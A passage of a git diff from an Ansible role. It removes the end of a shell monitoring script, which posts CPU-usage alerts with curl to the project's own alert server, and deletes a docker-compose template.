https://alert.jingoh.fr/{{ alerts_backup_vault }} -elif [ "$parametre" = "cpu" ]; then - [ "$(echo "$(ps -eo %cpu --sort=-%cpu | awk 'NR>1 { sum += $1 } END { print sum }') > $(nproc) * 50" | bc)" -eq 1 ] && curl -u "$username:$password" -H "Title: CPU `nproc` cores" -H "ta:warning" -d "High usage `ps -eo %cpu --sort=-%cpu | awk 'NR>1 { sum += $1 } END { print sum }'`" https://alert.jingoh.fr/{{ alerts_cpu }} -else - echo "Paramètre invalide : Utilisez [storage|load|ping|health|ssl|backup_git|backup_vault|cpu]" -fi diff --git a/templates/docker-compose.yml.j2 b/templates/docker-compose.yml.j2 deleted file mode 100644 index a293c66..0000000 --- a/templates/docker-compose.yml.j2 +++ /dev/null @@ -1,2 +0,0 @@ -# {{ ansible_managed }} -{{ dockerapp_compose | to_nice_yaml(indent=3) }} \ No newline at end of file